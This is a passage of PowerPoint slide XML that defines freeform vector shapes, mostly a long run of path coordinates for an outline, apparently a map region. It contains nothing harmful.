                    <a:lnTo>
                      <a:pt x="222" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="22"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="35854" name="Group 406"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="9" y="328"/>
              <a:ext cx="4404" cy="3208"/>
              <a:chOff x="9" y="328"/>
              <a:chExt cx="4404" cy="3208"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36073" name="Freeform 206"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3038" y="2117"/>
                <a:ext cx="65" cy="95"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 65"/>
                  <a:gd name="T1" fmla="*/ 53 h 95"/>
                  <a:gd name="T2" fmla="*/ 63 w 65"/>
                  <a:gd name="T3" fmla="*/ 72 h 95"/>
                  <a:gd name="T4" fmla="*/ 55 w 65"/>
                  <a:gd name="T5" fmla="*/ 85 h 95"/>
                  <a:gd name="T6" fmla="*/ 52 w 65"/>
                  <a:gd name="T7" fmla="*/ 86 h 95"/>
                  <a:gd name="T8" fmla="*/ 50 w 65"/>
                  <a:gd name="T9" fmla="*/ 86 h 95"/>
                  <a:gd name="T10" fmla="*/ 47 w 65"/>
                  <a:gd name="T11" fmla="*/ 87 h 95"/>
                  <a:gd name="T12" fmla="*/ 43 w 65"/>
                  <a:gd name="T13" fmla="*/ 87 h 95"/>
                  <a:gd name="T14" fmla="*/ 39 w 65"/>
                  <a:gd name="T15" fmla="*/ 89 h 95"/>
                  <a:gd name="T16" fmla="*/ 38 w 65"/>
                  <a:gd name="T17" fmla="*/ 89 h 95"/>
                  <a:gd name="T18" fmla="*/ 35 w 65"/>
                  <a:gd name="T19" fmla="*/ 89 h 95"/>
                  <a:gd name="T20" fmla="*/ 30 w 65"/>
                  <a:gd name="T21" fmla="*/ 93 h 95"/>
                  <a:gd name="T22" fmla="*/ 28 w 65"/>
                  <a:gd name="T23" fmla="*/ 95 h 95"/>
                  <a:gd name="T24" fmla="*/ 19 w 65"/>
                  <a:gd name="T25" fmla="*/ 82 h 95"/>
                  <a:gd name="T26" fmla="*/ 19 w 65"/>
                  <a:gd name="T27" fmla="*/ 78 h 95"/>
                  <a:gd name="T28" fmla="*/ 19 w 65"/>
                  <a:gd name="T29" fmla="*/ 76 h 95"/>
                  <a:gd name="T30" fmla="*/ 22 w 65"/>
                  <a:gd name="T31" fmla="*/ 76 h 95"/>
                  <a:gd name="T32" fmla="*/ 24 w 65"/>
                  <a:gd name="T33" fmla="*/ 74 h 95"/>
                  <a:gd name="T34" fmla="*/ 21 w 65"/>
                  <a:gd name="T35" fmla="*/ 71 h 95"/>
                  <a:gd name="T36" fmla="*/ 18 w 65"/>
                  <a:gd name="T37" fmla="*/ 70 h 95"/>
                  <a:gd name="T38" fmla="*/ 16 w 65"/>
                  <a:gd name="T39" fmla="*/ 69 h 95"/>
